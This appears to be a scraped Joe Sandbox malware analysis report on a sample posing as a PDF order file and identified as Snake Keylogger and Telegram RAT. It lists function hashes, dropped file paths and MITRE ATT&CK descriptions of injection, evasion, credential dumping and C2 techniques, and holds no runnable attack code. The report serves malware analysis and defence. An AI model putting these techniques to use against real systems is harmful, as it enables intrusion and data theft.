Snapshot File: hcaresult_6_2_236e0000_msiexec.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 20d35f3247b9709bdfad1fb5f5bbfee7dc1b7b6e2e9c406656bc94ad63a98ead
Instruction ID: c0171d1f36225ff2d9b3d1d77430b6f3487e94a4d834c64f3f3a9e1193817af7
Opcode Fuzzy Hash: 20d35f3247b9709bdfad1fb5f5bbfee7dc1b7b6e2e9c406656bc94ad63a98ead
Instruction Fuzzy Hash: 0DC19174E01218CFDB14DFA5C994BADBBF2AF89301F1084A9D809AB365DB355E85CF50

Function 236E1A50 Relevance: .3, Instructions: 268COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.2963297311.00000000236E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 236E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_236e0000_msiexec.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 74c004864999f0d629c3766f55da7b0cb77d9d850ce2cecdbaf5f6c2682ecae5
Instruction ID: 90c0d23938c0cb5ad11a0bcb9aa57d6b7055bbc354c763a770a781684d78c3a7
Opcode Fuzzy Hash: 74c004864999f0d629c3766f55da7b0cb77d9d850ce2cecdbaf5f6c2682ecae5
Instruction Fuzzy Hash: 8FC1A174E01218CFDB18DFA5C994BADBBF2AF89301F1084A9D809AB365DB355E85CF50

Function 236E9E38 Relevance: .3, Instructions: 268COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.2963297311.00000000236E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 236E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_236e0000_msiexec.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4aecff81bf860062c55bdc25dcc11a32810b88fc95ff47133c7955c8eba8cb77
Instruction ID: 3f39fa51726764742a93c82c35f718788e6b878c23198393290119261afdb023
Opcode Fuzzy Hash: 4aecff81bf860062c55bdc25dcc11a32810b88fc95ff47133c7955c8eba8cb77
Instruction Fuzzy Hash: F5C1A174E01218CFDB14DFA5C994BADBBF2AF89301F1084A9D809AB365DB395E85CF50

Function 236E3008 Relevance: .3, Instructions: 268COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.2963297311.00000000236E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 236E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_236e0000_msiexec.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9af7ab2c9afc5e68ffe898ab66c14024a8e87fca70e378dc743d4bc07caf7a9f
Instruction ID: f27bbcb7464d8601571ad9ea459a3d39b2be40349e412f6ea2a518249807fef7
Opcode Fuzzy Hash: 9af7ab2c9afc5e68ffe898ab66c14024a8e87fca70e378dc743d4bc07caf7a9f
Instruction Fuzzy Hash: 7EC1B274E01218CFDB14DFA5C954B9DBBF2AF89301F2484A9D808AB355DB359E85CF10

Function 236E4A18 Relevance: .3, Instructions: 268COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.2963297311.00000000236E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 236E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_236e0000_msiexec.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: cabda1b88acaa31171fa5be73387288026ecf6ab1701bf3b45cf214044a80da9
Instruction ID: 1c258f62e08c45adbe446d3cb31adb46ed223c2cd033b3bacee3c427d797877d
Opcode Fuzzy Hash: cabda1b88acaa31171fa5be73387288026ecf6ab1701bf3b45cf214044a80da9
Instruction Fuzzy Hash: 63C1A074E01218CFDB14DFA5C994BADBBF2AF89301F2084A9D809AB365DB355E85CF50

Function 236E82F0 Relevance: .3, Instructions: 268COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.2963297311.00000000236E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 236E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_236e0000_msiexec.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e79486eb7d69e8e029512bc1aa193aee49f9a46cde2c253c7b424d0aff30fb32
Instruction ID: 0766c21532787e9ad5d266357a9a7c9d0325921c512ceaec2990319dc680aaa0
Opcode Fuzzy Hash: e79486eb7d69e8e029512bc1aa193aee49f9a46cde2c253c7b424d0aff30fb32
Instruction Fuzzy Hash: 1EC1A074E01218CFDB14DFA5C994BADBBF2AF89301F2084A9D809AB365DB355E85CF50

Function 236E08F0 Relevance: .3, Instructions: 268COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.2963297311.00000000236E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 236E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_236e0000_msiexec.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 952693a14cd4c2d8dd8026a9d33147614205c0e3cac0ecfaa11f38add17f18ca
Instruction ID: fc1a889969bb491154bbfc639847440e4476b69ec7a704150e9460c2b3d50f54
Opcode Fuzzy Hash: 952693a14cd4c2d8dd8026a9d33147614205c0e3cac0ecfaa11f38add17f18ca
Instruction Fuzzy Hash: 42C19074E01218CFDB14DFA5C994BADBBF2AB89301F2084A9D809AB365DB355E85CF50

Function 236E52C8 Relevance: .3, Instructions: 268COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.2963297311.00000000236E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 236E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_236e0000_msiexec.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 73f2ea0830324a235d09428bec74464bc94ddc5992a27272eb616c6601e48ee7
Instruction ID: 1ede65d2c774af32bd7b9a50df31926d53522961eacff04ecdc65a39b50fcb6d
Opcode Fuzzy Hash: 73f2ea0830324a235d09428bec74464bc94ddc5992a27272eb616c6601e48ee7
Instruction Fuzzy Hash: 0DC1A174E01218CFDB14DFA5C994BADBBF2AF89301F1084A9D909AB365DB359E85CF10

Function 236E1EA8 Relevance: .3, Instructions: 268COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.2963297311.00000000236E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 236E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_236e0000_msiexec.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: fc69caa8717ffd9fa47248f825733d7939ee304ac9d43164e8f8e8ab83a06882
Instruction ID: 2d1c62f7f71cf3f9df44140dfe354887f48e30be58d4c0dfd4248c032c4ba1be
Opcode Fuzzy Hash: fc69caa8717ffd9fa47248f825733d7939ee304ac9d43164e8f8e8ab83a06882
Instruction Fuzzy Hash: 3DC1B074E01218CFDB54DFA5C994BADBBF2AF89301F2084A9D808AB365DB355E85CF50

Function 236E38B8 Relevance: .3, Instructions: 268COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.2963297311.00000000236E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 236E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_236e0000_msiexec.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d32f2dfbdbbcec03859c2c86dda5ccb9763d0edab972980ab1ef6f97484ffb0e
Instruction ID: a39e26253dd8b45751d089ece0c7a424282fd648597dad215f5e15658d71b74a
Opcode Fuzzy Hash: d32f2dfbdbbcec03859c2c86dda5ccb9763d0edab972980ab1ef6f97484ffb0e
Instruction Fuzzy Hash: 37C1A174E01218CFDB14DFA5C994BADBBF2AF89301F2484A9D809AB355DB359E85CF10

Function 236E7E98 Relevance: .3, Instructions: 268COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.2963297311.00000000236E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 236E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_236e0000_msiexec.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 01f0da01e49a1917e0b0b3d1c7fa5df8398fe2d46243f5ad110d705cc250a528
Instruction ID: 38f597b2f9a9a52b20a2f7d6584348508897f251cf374f65bc3617f222bf4d58
Opcode Fuzzy Hash: 01f0da01e49a1917e0b0b3d1c7fa5df8398fe2d46243f5ad110d705cc250a528
Instruction Fuzzy Hash: F5C1B174E01218CFDB14DFA5C994BADBBF2AF89301F2084A9D809AB365DB355E85CF50

Function 236E0498 Relevance: .3, Instructions: 268COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.2963297311.00000000236E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 236E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_236e0000_msiexec.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2c12bdfc5adaccebc18089fe29cd26566755fa4c872042c44851a44adfbd54a3
Instruction ID: 633b0b02daa26f6c580ba5cab64804b1bf6a525c97deb2a3645da97db692e7d5
Opcode Fuzzy Hash: 2c12bdfc5adaccebc18089fe29cd26566755fa4c872042c44851a44adfbd54a3
Instruction Fuzzy Hash: 99C1A174E01218CFDB14DFA5C994BADBBF2AF89301F2084A9D809AB365DB355E85CF50

Function 236EA290 Relevance: .3, Instructions: 268COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.2963297311.00000000236E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 236E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_236e0000_msiexec.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2af37b0e05946d7136301d0adbe0b2331d2c226a068d50b40c0b213066651968
Instruction ID: 54852dda6f82ed40fafee984f4f3f82a5d8e37f501f67067bf3350251b5ea709
Opcode Fuzzy Hash: 2af37b0e05946d7136301d0adbe0b2331d2c226a068d50b40c0b213066651968
Instruction Fuzzy Hash: CAC1A174E01218CFDB14DFA5C994BADBBF2AF89301F1084A9D809AB369DB355E85CF50

Function 236EDBF9 Relevance: .1, Instructions: 99COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.2963297311.00000000236E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 236E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_236e0000_msiexec.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 477075097cf3260ba58d3f8462b65b653791882390557ed69253471656735462
Instruction ID: 8ad9afa7c1d3242afbca32589598868a3285b0c1e2fdb818ea41418bfc29a69a
Opcode Fuzzy Hash: 477075097cf3260ba58d3f8462b65b653791882390557ed69253471656735462
Instruction Fuzzy Hash: 3941EDB4D022199FCB00DFA8D594BEEBBF1AF49304F1454AAD414BB390D7389A45CF99

Function 236EDC08 Relevance: .1, Instructions: 93COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.2963297311.00000000236E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 236E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_236e0000_msiexec.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a976ee3bdf8e01aa4260bcc27b6b7fb1999bd61b5f6698704dd3448c6f48e13c
Instruction ID: 6e6a4cd0519aba095b411d3d63b95d84f9d320d371debed135b72390e4deeb81
Opcode Fuzzy Hash: a976ee3bdf8e01aa4260bcc27b6b7fb1999bd61b5f6698704dd3448c6f48e13c
Instruction Fuzzy Hash: D041EEB4D022199FCB04DFA8D594BAEBBF1BF49304F1454A9E414BB390D7789A40CF99

Function 20F76920 Relevance: 5.0, Strings: 4, Instructions: 49COMMON

Download Yara Rule

Strings

\;^q, xrefs: 20F7695E
\;^q, xrefs: 20F7692C
\;^q, xrefs: 20F76936
\;^q, xrefs: 20F76952

Memory Dump Source

Source File: 00000006.00000002.2957083648.0000000020F70000.00000040.00000800.00020000.00000000.sdmp, Offset: 20F70000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_20f70000_msiexec.jbxd

Similarity

API ID:
String ID: \;^q$\;^q$\;^q$\;^q
API String ID: 0-3001612457
Opcode ID: f0c3ab91fdb6a270ed5c71c762abf5f3c5ad5548fa07a944d58ce2ea2c24b6ed
Instruction ID: 27cba1943fa454a9a4a1ccfc59de5a79d5a2d8aa470963aadec1012d42be0ca8
Opcode Fuzzy Hash: f0c3ab91fdb6a270ed5c71c762abf5f3c5ad5548fa07a944d58ce2ea2c24b6ed
Instruction Fuzzy Hash: 2F01BC32B80214AFCB048EADC444A0637FBAFC8B71B21846BE645CB3B1DA31DC418752

Description:	Adversaries may abuse Windows Management Instrumentation (WMI) to execute malicious commands and payloads. WMI is an administration feature that provides a uniform environment to access Windows system components. The WMI service enables both local and remote access, though the latter is facilitated by Remote Services such as Distributed Component Object Model (DCOM) and Windows Remote Management (WinRM).Remote WMI over DCOM operates using port 135, whereas WMI over WinRM operates over port 5985 when using HTTP and 5986 for HTTPS.
Tactics:	Execution
Data Sources:	Command: Command Execution, Network Traffic: Network Connection Creation, Process: Process Creation, WMI: WMI Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse PowerShell commands and scripts for execution. PowerShell is a powerful interactive command-line interface and scripting environment included in the Windows operating system.Adversaries can use PowerShell to perform a number of actions, including discovery of information and execution of code. Examples include the `Start-Process` cmdlet which can be used to run an executable and the `Invoke-Command` cmdlet which runs a command locally or on a remote computer (though administrator permissions are required to use PowerShell to connect to remote systems).
Tactics:	Execution
Data Sources:	Command: Command Execution, Module: Module Load, Process: Process Creation, Process: Process Metadata, Script: Script Execution
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to DLL Search Order Hijacking , side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s).
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	File: File Creation, File: File Modification, Module: Module Load, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify access tokens to operate under a different user or system security context to perform actions and bypass access controls. Windows uses access tokens to determine the ownership of a running process. A user can manipulate access tokens to make a running process appear as though it is the child of a different process or belongs to someone other than the user that started the process. When this occurs, the process also takes on the security context associated with the new token.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	Active Directory: Active Directory Object Modification, Command: Command Execution, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, User Account: User Account Metadata
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	File: File Metadata, File: File Modification, Module: Module Load, Process: OS API Execution, Process: Process Access, Process: Process Metadata, Process: Process Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify and/or disable security tools to avoid possible detection of their malware/tools and activities. This may take many forms, such as killing security software processes or services, modifying / deleting Registry keys or configuration files so that tools do not operate properly, or other methods to interfere with security tools scanning or reporting information. Adversaries may also disable updates to prevent the latest security patches from reaching tools on victim systems.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, Driver: Driver Load, Process: Process Creation, Process: Process Termination, Sensor Health: Host Status, Service: Service Metadata, Windows Registry: Windows Registry Key Deletion, Windows Registry: Windows Registry Key Modification
Platforms:	Containers, IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Creation, File: File Metadata, Module: Module Load, Process: OS API Execution, Process: Process Creation, Script: Script Execution, WMI: WMI Creation, Windows Registry: Windows Registry Key Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may perform software packing or virtual machine software protection to conceal their code. Software packing is a method of compressing or encrypting an executable. Packing an executable changes the file signature in an attempt to avoid signature-based detection. Most decompression techniques decompress the executable code in memory. Virtual machine software protection translates an executable's original code into a special format that only a special virtual machine can run. A virtual machine is then called to run this code.
Tactics:	Defense Evasion
Data Sources:	File: File Metadata
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Metadata, File: File Modification, Image: Image Metadata, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Scheduled Job: Scheduled Job Metadata, Scheduled Job: Scheduled Job Modification, Service: Service Creation, Service: Service Metadata
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to dump credentials to obtain account login and credential material, normally in the form of a hash or a clear text password, from the operating system and software. Credentials can then be used to perform Lateral Movement and access restricted information.
Tactics:	Credential Access
Data Sources:	Active Directory: Active Directory Object Access, Command: Command Execution, File: File Access, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Access, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Firewall: Firewall Enumeration, Firewall: Firewall Metadata, Process: OS API Execution, Process: Process Creation
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may look for details about the network configuration and settings, such as IP and/or MAC addresses, of systems they access or through information discovery of remote systems. Several operating system administration utilities exist that can be used to gather this information. Examples include Arp , ipconfig / ifconfig , nbtstat , and route .
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Creation, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may search local system sources, such as file systems and configuration files or local databases, to find files of interest and sensitive data prior to Exfiltration.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Access, Process: OS API Execution, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may target user email to collect sensitive information. Emails may contain sensitive data, including trade secrets or personal information, that can prove valuable to adversaries. Adversaries can collect or forward email from mail servers or clients.
Tactics:	Collection
Data Sources:	Application Log: Application Log Content, Command: Command Execution, File: File Access, Logon Session: Logon Session Creation, Network Traffic: Network Connection Creation
Platforms:	Google Workspace, Linux, macOS, Office 365, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may collect data stored in the clipboard from users copying information within or between applications.
Tactics:	Collection
Data Sources:	Command: Command Execution, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report Order requirements CIF Greece_pdf.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Threat Intel

Malware Configuration

Threatname: Telegram RAT

Threatname: Snake Keylogger

Yara Signatures

Memory Dumps

Sigma Signatures

System Summary

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Location Tracking

Cryptography

Compliance

Spreading

Software Vulnerabilities

Networking

Key, Mouse, Clipboard, Microphone and Screen Capturing

System Summary

Data Obfuscation

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Lowering of HIPS / PFW / Operating System Security Settings

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_c5bj4afn.jkc.psm1

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_iimpnwhy.qhp.ps1

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_jecjibju.mtj.ps1

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_y2bkz4ka.g2p.psm1

C:\Users\user\AppData\Roaming\skittaget\lektier\Familieskabet.Sch

C:\Users\user\AppData\Roaming\skittaget\lektier\Genetableringernes111\frastdningens.hag

C:\Users\user\AppData\Roaming\skittaget\lektier\Genetableringernes111\pelvetia.txt

C:\Users\user\AppData\Roaming\skittaget\lektier\Genetableringernes111\sakkende.dro

C:\Users\user\AppData\Roaming\skittaget\lektier\Hyldebrret2.faj

C:\Users\user\AppData\Roaming\skittaget\lektier\Juicy.sla

Windows Analysis Report
Order requirements CIF Greece_pdf.exe

Function 00403325 Relevance: 96.6, APIs: 33, Strings: 22, Instructions: 366
stringcomfileCOMMON

Function 00405339 Relevance: 54.3, APIs: 36, Instructions: 282
windowclipboardmemoryCOMMON

Function 00403C84 Relevance: 48.3, APIs: 32, Instructions: 346
windowstringCOMMON

Function 004038E7 Relevance: 45.7, APIs: 13, Strings: 13, Instructions: 215
stringregistryCOMMON

Function 00402EA1 Relevance: 24.7, APIs: 5, Strings: 9, Instructions: 181
memoryCOMMON

Function 00406167 Relevance: 21.2, APIs: 7, Strings: 5, Instructions: 199
stringCOMMON

Function 00401759 Relevance: 17.6, APIs: 5, Strings: 5, Instructions: 147
stringtimeCOMMON

Function 004030D8 Relevance: 14.2, APIs: 4, Strings: 4, Instructions: 161
COMMON

Function 004051FB Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 73
stringwindowCOMMON

Function 0040646F Relevance: 10.5, APIs: 3, Strings: 3, Instructions: 36
libraryCOMMON

Description:	Adversaries may use an existing, legitimate external Web service as a means for relaying data to/from a compromised system. Popular websites and social media acting as a mechanism for C2 may give a significant amount of cover due to the likelihood that hosts within a network are already communicating with them prior to a compromise. Using common services, such as those offered by Google or Twitter, makes it easier for adversaries to hide in expected noise. Web service providers commonly use SSL/TLS encryption, giving adversaries an added level of protection.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Tools or files may be copied from an external adversary-controlled system to the victim network through the command and control channel or through alternate protocols such as ftp . Once present, adversaries may also transfer/spread tools between victim devices within a compromised environment (i.e. Lateral Tool Transfer ).
Tactics:	Command and Control
Data Sources:	Command: Command Execution, File: File Creation, Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use an OSI non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using OSI application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may shutdown/reboot systems to interrupt access to, or aid in the destruction of, those systems. Operating systems may contain commands to initiate a shutdown/reboot of a machine or network device. In some cases, these commands may also be used to initiate a shutdown/reboot of a remote computer or network device via Network Device CLI (e.g. `reload` ).
Tactics:	Impact
Data Sources:	Command: Command Execution, Process: Process Creation, Sensor Health: Host Status
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre